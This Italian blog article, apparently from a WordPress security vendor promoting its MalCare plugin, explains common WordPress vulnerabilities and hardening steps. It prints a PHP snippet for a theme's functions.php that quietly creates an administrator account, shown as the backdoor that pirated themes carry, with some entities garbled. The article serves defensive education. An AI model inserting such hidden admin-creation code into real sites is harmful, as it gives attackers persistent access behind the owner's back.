Prima di iniziare a mostrarvi come e perché gli hacker hackerano i siti, è necessario capire la struttura del vostro sito WordPress. È composto da file e da un database. I file di WordPress contengono principalmente tutte le impostazioni e le configurazioni, mentre il database memorizza tutti i dati di post, commenti, utenti e un sacco di altre cose.
Entrambi gli elementi sono necessari per generare il frontend del tuo sito web. Ma entrambi possono anche essere sfruttati dagli hacker.
Prima, diamo un’occhiata a come gli hacker entrano nei siti WordPress.
Nota: Questa non è una guida su come violare un sito WordPress. È un articolo educativo per mostrarvi come gli hacker possono sfruttare le vulnerabilità per violare il vostro sito. Detto questo, cominciamo.
6 vulnerabilità comuni che permettono agli hacker di violare i siti WordPress
Per violare un sito web, dovrebbe avere un punto di vulnerabilità. Abbiamo elencato le vulnerabilità comuni trovate nei siti WordPress:
Eseguire un’installazione di WordPress obsoleta
Circa il 44% dei siti WordPress violati erano in esecuzione su installazioni obsolete, secondo un rapporto del 2018. Come proprietario di un sito web, vedrai frequenti aggiornamenti disponibili per l’installazione di WordPress, in questo modo:
Di solito, gli aggiornamenti portano nuove funzionalità, correzioni di bug o risolvono problemi di incompatibilità. A volte, portano anche le patch di sicurezza di WordPress. Questo significa che se è stata trovata una falla di sicurezza nel software, gli sviluppatori la correggono rapidamente e rilasciano un aggiornamento che rimuove la falla.
Una volta rilasciato, la presenza di una falla di sicurezza di wp è resa nota al pubblico. Gli hacker quindi cercano i siti web che non hanno aggiornato, trovano la falla e la usano per entrare nel sito.
Quindi se scegliete di non aggiornare la vostra installazione di WordPress, allora non avete installato le nuove funzioni di sicurezza e avete dato il vostro sito web su un piatto d’argento agli hacker.
Mantenete sempre aggiornato il vostro sito WordPress.
Suggerimento: Le patch di sicurezza vengono rilasciate come aggiornamenti minori. Puoi dire se si tratta di un aggiornamento maggiore se è V5.2 o V5.3. Un aggiornamento minore sarebbe V5.2.1, per esempio. Per impostazione predefinita, gli aggiornamenti minori sono automatici, ma puoi disattivarli. Raccomandiamo di mantenere l’opzione di aggiornamento automatico attivata per gli aggiornamenti minori.
Oltre a mantenere aggiornati i vostri plugin, temi e core, vi suggeriamo vivamente di mantenere aggiornati i sali e le chiavi di sicurezza di WordPress.
Usare credenziali deboli
Un altro punto di ingresso comune per gli hacker sono le credenziali deboli. Gli hacker utilizzano un metodo chiamato attacchi di forza bruta in cui programmano i bot per la scansione dei siti WordPress su internet e tentano diverse combinazioni di nomi utente e password per entrare nel sito web.
Se hai lasciato il tuo nome di login come ‘admin’, sono già un passo più vicini ad ottenere l’accesso al tuo sito. Tuttavia, se hai usato password comuni come ‘password123’, allora è facile per loro indovinarle. Questi bot possono fare migliaia, se non milioni di tentativi di hacking in un solo secondo (lettura consigliata – Guida alla protezione della pagina di login di WordPress).
Si consiglia di cambiare la password con una passphrase in combinazione con numeri e simboli per rendere la password più forte che mai, così:
Avere installato temi pirata
I temi premium sono attraenti e tutti vorremmo avere un grande tema per il nostro sito web per renderlo unico. Molte volte i proprietari di siti web cadono preda di versioni gratuite, craccate o piratate di questi temi. Tali temi da fonti inaffidabili possono portare malware preinstallato. Installandolo sul tuo sito WordPress, installi anche il malware. Questo apre la porta agli hacker. Abbiamo dettagliato come questo accade più tardi.
Scaricate sempre temi solo da fonti affidabili come il repository di WordPress o marketplace come ThemeForest e ThemeTrust.
Utilizzare plugin vulnerabili
Gli hacker sono costantemente a caccia di falle nella sicurezza dei plugin. Se ne trovano una, scansionano internet per i siti WordPress che hanno il plugin installato. Questo permette loro di entrare in migliaia di siti web in pochi minuti.
Molte volte, soprattutto con i plugin gratuiti, gli sviluppatori possono scoprire che non possono più mantenere il plugin e abbandonarlo. (Questo può accadere anche con i temi). In questi casi, la sicurezza del plugin decade e averlo installato sul tuo sito rappresenta una minaccia.
Scarica i plugin solo da fonti affidabili come il repository di WordPress o CodeCanyon. Elimina regolarmente i plugin WordPress e i temi che non usi più. Controlla lo stato dei plugin che usi per vedere se sono aggiornati e mantenuti dallo sviluppatore.
Utilizzare un sistema locale insicuro
A volte, potrebbe essere il vostro computer stesso a non essere sicuro. Se qualcuno entra nel vostro sistema, può facilmente accedere al vostro sito WordPress perché nella maggior parte dei casi, il wp-admin è già loggato e aperto.
Questo può accadere se non avete un firewall o uno strumento anti-malware installato sul vostro sistema.
Si raccomanda di non utilizzare mai un computer pubblico o una connessione wifi pubblica non protetta sul vostro sistema locale che utilizzate per eseguire il vostro sito WordPress. Tieni sempre attivi gli strumenti di rilevamento di malware sul tuo sito.
Utilizzare un servizio di web hosting scadente
Mentre si sceglie un piano di hosting, si tende a cercare il più economico. Ma il più economico non sempre garantisce buone misure di sicurezza.
I server condivisi possono essere più economici ma mettono anche il tuo sito a rischio. Non puoi sapere con quali siti condividi un server web e se hanno implementato protocolli di sicurezza. Se vengono violati, ci sono possibilità che l’infezione da malware si diffonda anche al tuo sito.
Ci sono anche momenti in cui gli host di siti web sono compromessi, il che significa che tutti i siti web sulla piattaforma di hosting sono esposti per gli hacker da sfruttare.”
Prima di scegliere un host web, leggi cosa offrono e cosa dicono i clienti di loro. Questo ti aiuterà ad avere una buona idea di quale host web scegliere.
Per trovare un sito vulnerabile, gli hacker creano i propri bot o usano scanner di vulnerabilità gratuiti disponibili online per setacciare internet. Quando ne trovano uno, sfruttano la falla di sicurezza che ha (come quelle menzionate sopra) per avere accesso ai file o al database del sito WordPress.
Poi, iniettano codice che eseguirà attività dannose come l’invio di e-mail di spam, la vendita di prodotti illegali, ecc. Iniettano anche codice per creare nuovi account utente o backdoor WordPress che li aiuteranno a riottenere l’accesso al vostro sito ogni volta che vogliono.
Come violare un sito WordPress?
Ci sono innumerevoli modi per violare un sito WordPress. Qui, discuteremo due dei modi più comuni in cui gli hacker iniettano codice nel tuo sito web per creare un nuovo login utente:
I. Attraverso i file (malware preinstallato in un tema pirata)
Come abbiamo discusso in precedenza, molti proprietari di siti WordPress cadono preda di temi pirata. Si ottengono tutte le caratteristiche gratuitamente! Ma tali software possono avere uno script per creare un nuovo ID di accesso. Una volta installato il tema, il nuovo account utente viene creato e l’hacker può semplicemente accedere al tuo sito web dall’amministrazione di WordPress.
Vi mostreremo come è possibile creare un nuovo account utente sul tuo sito WordPress utilizzando il file del tema. Questo ti aiuterà a capire come i temi pirata aiutano un hacker ad avere accesso al tuo sito.
Tip: Questo può anche tornare utile se sei bloccato dal tuo wp-admin ma hai ancora accesso al tuo account di web hosting.
Attenzione:
Andare dietro le quinte di un sito WordPress è un affare rischioso. È meglio farlo su un sito di prova o di staging. Se scegliete di farlo sul vostro sito live, assicuratevi di fare un backup affidabile. Nel caso in cui qualcosa vada storto, è possibile ripristinare il backup di WordPress.
Step 1: Accedi al tuo account di hosting WordPress. Vai al cPanel e accedi al File Manager.
Puoi anche accedere ai file attraverso un client FTP come FileZilla usando le credenziali FTP.
Step 2: I tuoi file WordPress di solito risiedono in una cartella chiamata public_html. All’interno di essa, puoi accedere a wp_content/themes.
Step 3: Qui, devi scegliere il tema attivo sul tuo sito web e modificare il file functions.php.
Step 4: copia e incolla il seguente codice alla fine del file. (Se c’è un tag di chiusura come ?>, assicurati che il codice arrivi sulla linea prima di questo.)
$new_user_email = ‘[email protected]’;
$new_user_password = ‘password’;
if(!username_exists($new_user_email)) {
$user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email);
wp_update_user(array(‘ID’ => $user_id, ‘nickname’ => $user_id, ‘nickname’ =&;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt; $new_user_email));
$user = new WP_User($user_id);
$user-&;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;set_role(‘administrator’);
}
Modifica le prime due righe con l’email e la password di tua scelta. Una volta salvato il file e aperto il vostro sito web, il codice verrà eseguito e potrete accedere utilizzando queste nuove credenziali.
Speriamo che ora abbiate capito che quando installate un tema pirata se ha questo blocco di codice, verrà creato un nuovo account utente. Tutto quello che l’hacker deve fare è inserire le credenziali e accedere.
II. Attraverso il database – SQL Injection
Questa è un’altra delle ragioni più comuni per cui i siti WordPress vengono violati. Per iniziare, è necessario sapere due cose sulle iniezioni SQL:
-
- WordPress usa MySQL come sistema di database predefinito.
- Per generare il frontend di un sito web, WordPress usa le query SQL per estrarre i dati dal database.
Non dobbiamo preoccuparci di cosa sia questo o i dettagli di esso per ora. Quello che dovete sapere è che questo database è accessibile solo attraverso cPanel > phpMyAdmin. Ma gli hacker trovano modi per accedervi senza usare il cPanel. Uno dei modi più comuni in cui gli hacker contattano il database di un sito è attraverso moduli vulnerabili su un sito web.
Un modulo è qualsiasi elemento in cui il testo può essere inserito come la barra di login di WordPress, il modulo di contatto, i commenti del blog WordPress, i pops di iscrizione, le pagine di checkout, e la barra di ricerca del sito.
Invece di inserire i dettagli richiesti nel modulo, l’hacker inserisce i suoi comandi SQL dannosi. Poiché tutte le informazioni inserite nel modulo vengono memorizzate nel vostro database, questo codice maligno troverà la sua strada dentro.
Per spiegare come questo accade, vi mostreremo come creare un nuovo account utente utilizzando il vostro database.
→ Creazione di un nuovo account utente attraverso il database
Passo 1: Accedi al cPanel e apri phpMyAdmin >Databases.
Passo 2: Qui, vedrai una lista di database. Devi selezionare il tuo database. (Se non conosci il nome del tuo database, puoi trovare questa informazione nel tuo wp-config, così).
Abbiamo selezionato il database secondo il nome nel file wp-config.
Passo 3: Poi, dalle tabelle che si popolano sul pannello di destra, devi trovare la tabella che finisce in _users (molto probabilmente sarà chiamata wp_users).
Step 4: Qui, puoi cliccare su ‘Insert’.
Step 5: Si aprirà la seguente schermata dove puoi inserire il nome utente, la password, l’email e il nome visualizzato.
Passo 6: Poi, clicca su ‘Vai’ e le tue modifiche saranno salvate. Ora è possibile accedere a WordPress utilizzando le nuove credenziali.
Lo stesso può essere fatto inserendo un blocco di codice SQL nel database. Simile al tema pirata, una volta che il codice entra nel database, verrà eseguito e verrà creato un nuovo utente. Possiamo pensare a questo come un hacker che crea semplicemente la propria porta in casa vostra ed entra direttamente.
Come impedire agli hacker di violare il vostro sito web?
Ci sono quattro passi principali che dovete fare per rendere il vostro sito abbastanza sicuro da tenere a bada gli hacker:
Installare un plugin di sicurezza per WordPress
Ogni sito WordPress ha bisogno di un plugin di sicurezza come MalCare. Proteggi il tuo sito WordPress con un tale plugin che scansionerà il sito web regolarmente. Individuerà qualsiasi attività sospetta, bloccherà il traffico dannoso e terrà fuori gli hacker. Nel caso in cui un hacker entri, sarai avvisato immediatamente e potrai pulire il tuo sito web immediatamente prima che possano fare danni.
Installa un certificato SSL
Questo certificato fornirà al tuo sito la crittografia dei dati. Ciò significa che quando qualcuno visita il tuo sito web, i dati vengono trasferiti tra il suo computer e il server del tuo sito web.
Se vengono trasferiti in chiaro, a volte gli hacker che sono in agguato possono prendere quei dati. Possono leggerli, rubarli o modificarli a loro piacimento.
Ma se è criptato, anche se un hacker ne entra in possesso, non sarà in grado di decifrarlo.
Puoi ottenere un certificato SSL dal tuo host web o da un provider SSL. Se sei preoccupato di spendere troppo per un certificato, provider come LetsEncrypt offrono SSL gratuiti.
Per sapere come installare un certificato SSL, dai un’occhiata a questa guida – Moving HTTP to HTTPS.
Fix Known Vulnerabilities
Come abbiamo detto prima, ci sono vulnerabilità comuni in WordPress. Si consiglia di adottare le seguenti misure per ridurre al minimo le vulnerabilità.
-
- Aggiornare WordPress e i suoi temi e plugin deve essere una priorità assoluta.
- Assicuratevi di utilizzare sempre credenziali di accesso forti per evitare attacchi brute forcing.
- Cancellare regolarmente temi e plugin inutilizzati
- Non utilizzate mai temi e plugin pirata. Scaricate sempre tali software da fonti affidabili come il repository di WordPress, CodeCanyon o ThemeForest.
- Utilizzate un fornitore di servizi di web hosting affidabile.
- Mantenete il vostro computer locale protetto installando un software anti-malware.
Harden Your WordPress Site
WordPress raccomanda che ogni sito web sulla loro piattaforma prenda alcune misure per rendere i loro siti più resistenti. Alcune di queste misure includono:
- Mantenete un firewall WordPress attivo. Questo aiuterà a bloccare la limitazione del numero di tentativi di accesso. Ogni utente ha solo tre possibilità di inserire correttamente le credenziali, dopo di che dovrà optare per “Password dimenticata” o contattare l’amministratore. Potete usare lo stesso plugin MalCare per implementare questo passo.
- Disabilitare le installazioni di plugin nel caso in cui abbiate più utenti che lavorano sul sito. Si vorrebbe garantire che nessuno installi un plugin liberamente senza controllare se sono affidabili e degni di fiducia per avere il tuo sito. Questo può essere fatto manualmente modificando un file chiamato wp-config.php nella tua installazione di WordPress. È inoltre possibile utilizzare il plugin MalCare per questo.
- Implementare l’autenticazione a 2 fattori per verificare la persona che accede. Questo viene fatto inviando una password una tantum al cellulare o all’e-mail registrati, o utilizzando applicazioni come Google Authenticator che generano una password in tempo reale ogni 30 secondi.
Ci sono molti altri modi in cui è possibile rendere più resistente il tuo sito web. Si raccomanda di implementare questi passi secondo i requisiti del tuo sito web.
Oltre a questo, puoi prendere alcune altre misure di sicurezza. Suggeriamo vivamente di seguire questa guida – Secure Your WordPress Site With wp-config.php.
Pensieri finali
Speriamo che questo articolo vi abbia dato una migliore comprensione di come le vulnerabilità possono apparire sul vostro sito web e come gli hacker entrano. Gli hacker non sono prevenuti e prenderanno di mira qualsiasi sito. Se il tuo sito è vulnerabile, c’è una buona possibilità che tu venga hackerato.
Per riassumere, ti consigliamo di ridurre al minimo le vulnerabilità, di installare un plugin di sicurezza e di irrigidire il tuo sito web in modo che gli hacker non abbiano la possibilità di entrare nel tuo sito.
Mantieni il tuo sito sicuro con il nostro MalCare Security Plugin!